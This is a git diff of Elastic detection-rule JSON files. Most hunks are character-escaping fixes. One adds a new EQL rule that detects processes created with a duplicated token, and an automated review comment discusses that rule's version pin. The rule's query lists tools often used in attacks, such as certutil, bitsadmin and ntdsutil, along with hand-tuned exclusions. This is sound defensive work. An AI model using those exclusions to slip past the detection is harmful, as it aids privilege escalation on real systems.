@@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json index dfd56e70a52..ab5334bc350 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_105.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json index 57dfe485f5b..fae6dd0d2e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json 
+++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_106.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json index b96b58ee23b..2ca796685ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json index 36a5ef0c60f..c55a79f2c8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json index d8e8e361100..3fefa7ed9b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json index 31e20705ca4..6afe208c610 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json index d83d4288da1..bba1240462f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa8fa52-44a7-4dae-b058-f3333b91c8d7_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json index e02bccdd51f..0243e7853a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json index f5b2ab23204..d2babbc0407 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_105.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json index fafefa1a848..b31b7c6467e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_106.json 
@@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json index c8d979642ff..ad59d46a7f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_107.json 
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json
new file mode 100644
index 00000000000..2e957492047
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_1.json
@@ -0,0 +1,131 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Process Created with a Duplicated Token",
+ "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name)\n",
+ "references": [
+ "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "process.Ext.effective_parent.executable",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "process.Ext.effective_parent.name",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "process.Ext.relative_file_creation_time",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "process.Ext.relative_file_name_modify_time",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "process.code_signature.status",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1134",
+ "name": "Access Token Manipulation",
+ "reference": "https://attack.mitre.org/techniques/T1134/",
+ "subtechnique": [
+ {
+ "id": "T1134.001",
+ "name": "Token Impersonation/Theft",
+ "reference": "https://attack.mitre.org/techniques/T1134/001/"
+ },
+ {
+ "id": "T1134.002",
+ "name": "Create Process with Token",
+ "reference": "https://attack.mitre.org/techniques/T1134/002/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 1
+ },
+ "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json
index bd6a8921b64..c0d7dcddda1 100644
--- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_102.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json
index 6828730d76a..ea29284d620 100644
--- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json
index 713a8c06bb5..17bf3e88bd8 100644
--- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
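Review bot: The query's leading comment says the new rule 1b0b4818 is only compatible with Elastic Endpoint 8.4+, yet `related_integrations` pins the endpoint package at `"version": "^8.2.0"`; the two should agree, since the pin is what package tooling and users read for compatibility, so either raise it to the floor the comment names (`"version": "^8.4.0"`) or correct the comment. The file also carries no `setup`, `note` or `false_positives` keys, whereas the sibling EQL rules in this changeset that set `"timestamp_override": "event.ingested"` ship a `setup` block; a short `note` explaining the hand-tuned rundll32 command-line exclusions and the 900-second file-age heuristic would give analysts something to triage and tune against for a medium-severity rule. The four `process.Ext.*` fields are declared `"ecs": false` with `"type": "unknown"`, consistent with the other entries, but that means no schema check will catch a renamed or absent field, so it is worth confirming they are populated by the endpoint package version actually being pinned.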
diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json index 70ae5a2e063..a418d9f619b 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json index 17ef5f7cc15..0f345bdf71d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json index bba5911de70..60f8613f5eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json index 1a5b9326bed..440f083f4ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json index a40fe4f5378..71a71022de4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json index 35aeebcc521..37173812ee4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json +++ b/packages/security_detection_engine/kibana/security_rule/1ba5160d-f5a2-4624-b0ff-6a1dc55d2516_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json index fa0433b5b60..a4f29104aa4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_4.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json index e51c16abbdc..27ed1dadeb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_5.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json index c5cb6b9ca42..bcd79bf167f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_6.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json index 54de15f5bbd..52f512b3c02 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_7.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json index d7fc30c021b..4bc94859c50 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_8.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json index 6389bdd07a0..473eef23438 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_9.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json b/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json index c97a9348435..37fc240e29c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1c5a04ae-d034-41bf-b0d8-96439b5cc774_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json index 18ada37843a..2670e27a834 100644 --- a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_105.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_106.json 